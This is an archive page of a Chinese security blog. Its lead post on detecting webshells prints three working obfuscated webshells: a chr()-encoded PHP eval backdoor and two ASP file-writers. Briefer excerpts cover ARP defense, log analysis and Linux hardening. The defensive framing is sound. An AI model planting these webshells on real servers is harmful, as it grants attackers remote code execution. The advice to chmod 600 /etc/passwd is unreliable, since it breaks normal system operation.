存档

‘网络安全’ 分类的存档

企业web安全之webshell防控浅谈

2013年7月15日 没有评论

     根据我片面的工作经验分析,目前企业遇到的入侵还是以web为入口的居多。其中webshell依然是常见的提权及渗透通道。
     下面我仅用自己的一点片面经验谈谈如何针对webshell做出安全防控工作。
     通常情况下,我们会依靠各种脚本和工具来查杀webshell,但是随着webshell的变异加密等多样化的变形方式的公布,传统的关键字对比查杀模式就出来了,大量误报以及漏报的问题。
      例如如下现在流行的几款变异小马:

exp1:

<script language=php>
$_1=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$_1(chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).
chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(97).chr(93).chr(41).chr(59));
</script>

exp2:

<%On Error Resume Next
Set f = Server.CreateObject("ADODB.Stream")
f.Type = 2
f.mode = 3
f.Charset = "gb2312"
f.open
f.WriteText "<"&Chr("37")&StrReverse(Request("cq3h63"))&Chr("37")&">"
f.SaveToFile Replace(Server.MapPath(Request("cq3h61")), ".\", "~1\")%>

exp3:

<%On Error Resume Next
{1 = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
" & Replace(Server.MapPath(Request("p1565pe51")), ".\", "~1\")
set {a = Server.Createobject("ad"&"ox"&"."&"cata"&"log")
{a.create {1
Set { = Server.Createobject("ad"&"odb"&"."&"conne"&"ction")
{.open {1
Set {s=server.createobject("ad"&"odb.rec"&"ord"&"set")
{s.Open "create table t1(a text)", {, 1, 1
{s.Open "insert into t1(a) values ('<"&Chr("3"&"7") & 
StrReverse(Request("p1565pe53")) 
& Chr("3"&"7") & ">')", {, 1, 1%>

     这些webshell如果利用现有的脚本和工具大多会产生漏报的现象,所以个人感觉与其扫描查找webshell不如做好监控措施,把我目前所用到的一些小经验分享下。
一:文件改动对比通知。
  1:文件MD5效验。
  2:文件大小效验。
二:文件数量监控。
  1:对文件的数量进行监控,定时遍历目录对文件出现新建和删除的情况能做到及时的通知。
这些要说一下细节。监控文件个数这方面一定要做好优化工作,不然如果做了邮件通知那么监控人员一定会被轰炸死.具体的优化也很简单:对上传目录、缓存目录、删除脚本执行权限,修复掉各种解析漏洞。这样类似这些上传的目录完全可以放心的不用加入监控目录。所以安全工作就是一环扣一环。
三:定期的邮件通知。
这个不需要太多解释,你做了监控自己看不到数据是白搭。
四:代码的SVN或本地存档备份。
这个很重要,安全和监控不是程序员,不可能了解程序员的每条语句和语法。在不确定代码是否被污染的情况下,差异对比的效果就很明显了。

    这四点是我目前在工作中的心得,个人感觉随着webshell的日新月异与其努力做到查杀webshell不如做到及时监控webshell和可疑文件。

国内各互联公司安全平台及联系方式汇总

2013年6月19日 没有评论

欢迎补充排名不分先后

阅读全文…

分类: 网络安全 标签:

[安全科普]ARP攻击防范方法总结

2013年6月17日 没有评论

1:静态绑定网关MAC
2:ARP防火墙
3:VLAN和交换机端口绑定

1、静态绑定网关MAC
方法一、手工绑定:
阅读全文…

分类: 网络安全 标签:

PHP文件包含漏洞攻防实战(很科普的一篇文章)

2013年6月4日 没有评论

摘要

PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。
阅读全文…

经典DDoS攻击类型

2013年5月22日 没有评论

经典DDoS攻击类型

DoS攻击存在很多经典的种类,从理清技术发展脉络的角度,下面简单介绍了他们的名称、原理和基本的攻击方式。

阅读全文…

分类: 网络安全 标签:

DDoS流量清洗解决方案选择七大误区

2013年5月22日 没有评论

DDoS攻击愈演愈烈,攻击的规模也越来越大。用户应该如何选择DDoS流量清洗方案、产品,才能避免无谓的设备采购,最终选择适合自己的产品,达到控制成本的同时又能有效防御DDoS攻击。本文阐述了DDoS流量清洗产品选型的七大误区,以及相应的注意事项。
阅读全文…

分类: 网络安全 标签: ,

Linux下Apache日志分析与状态查看方法

2013年5月21日 没有评论

假设apache日志格式为:
118.78.199.98 – – [09/Jan/2010:00:59:59 +0800] “GET /Public/Css/index.css HTTP/1.1″ 304 – “http://www.a.cn/common/index.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3)”

问题1:在apachelog中找出访问次数最多的10个IP。
awk ‘{print $1}’ apache_log |sort |uniq -c|sort -nr|head -n 10

awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
sort进行初次排序,为的使相同的记录排列到一起;
upiq -c 合并重复的行,并记录重复次数。
head进行前十名筛选;
sort -nr按照数字进行倒叙排序。

我参考的命令是: 阅读全文…

linux服务器安全配置

2013年5月13日 没有评论

1.禁止ping

/etc/rc.d/rc.local
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

2.对用户和口令文件进行权限控制
chmod 600 /etc/passwd
chmod 600 /etc/shadow
chmod 600 /etc/group
chmod 600 /etc/gshadow
3.给下面文件加上不可更改属性
chattr +i /etc/passwd
chattr +i /etc/shadow
chattr +i /etc/group
chattr +i /etc/gshadow
阅读全文…

DNS域传送泄露漏洞windows及BT5下测试方法

2013年5月13日 没有评论

DNS域传送泄露漏洞windows及BT5下测试方法如下:
假如要测试www.xxxxxx.net这个站点是否存在DNS域传送泄露漏洞,可以使用下面的方法:

<一>在Windows下测试方法:
阅读全文…

分类: 网络安全 标签: , , , ,

彻底删除Web路径下所有”.svn”遗留文件

2013年5月6日 没有评论

Linux:
find ./ -name .svn | xargs rm -rf
Windows:
for /f “tokens=*” %i in (‘dir /s /b .svn’) do (rd /Q /S %i)

遍历当前路径下所有子目录,并删除指定文件。

作用就是防止信息泄漏代码泄漏

分类: 网络安全 标签: ,